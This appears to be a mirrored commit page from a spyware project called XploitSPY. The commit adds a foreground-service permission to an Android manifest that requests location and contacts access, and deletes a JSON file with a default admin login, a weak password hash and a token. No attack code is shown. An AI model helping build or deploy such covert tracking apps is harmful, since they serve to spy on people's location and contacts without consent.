mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 09:59:20 +08:00
Added perm
This commit is contained in:
parent
2b4d1de18e
commit
b7dccc4b8e
@ -16,6 +16,7 @@
|
||||
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
|
||||
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
|
||||
<uses-permission android:name="android.permission.READ_CONTACTS"/>
|
||||
<uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
|
||||
<application android:allowBackup="true" android:appComponentFactory="android.support.v4.app.CoreComponentFactory" android:hardwareAccelerated="false" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:supportsRtl="true" android:theme="@style/AppTheme">
|
||||
<activity android:launchMode="singleInstance" android:name="com.remote.app.MainActivity">
|
||||
<intent-filter>
|
||||
|
@ -1,26 +0,0 @@
|
||||
{
|
||||
"admin": {
|
||||
"username": "admin",
|
||||
"password": "5f4dcc3b5aa765d61d8327deb882cf99",
|
||||
"loginToken": "d1b6b9a23de5b8be7371f39ad50f52f6",
|
||||
"logs": [
|
||||
{
|
||||
"time": "2020-01-11T15:23:07.971Z",
|
||||
"type": "SUCCESS",
|
||||
"message": "Build Succeded!"
|
||||
},
|
||||
{
|
||||
"time": "2020-01-11T15:27:32.586Z",
|
||||
"type": "SUCCESS",
|
||||
"message": "Build Succeded!"
|
||||
},
|
||||
{
|
||||
"time": "2020-01-11T16:08:04.582Z",
|
||||
"type": "SUCCESS",
|
||||
"message": "Build Succeded!"
|
||||
}
|
||||
],
|
||||
"ipLog": []
|
||||
},
|
||||
"clients": []
|
||||
}
|
Loading…
Reference in New Issue
Block a user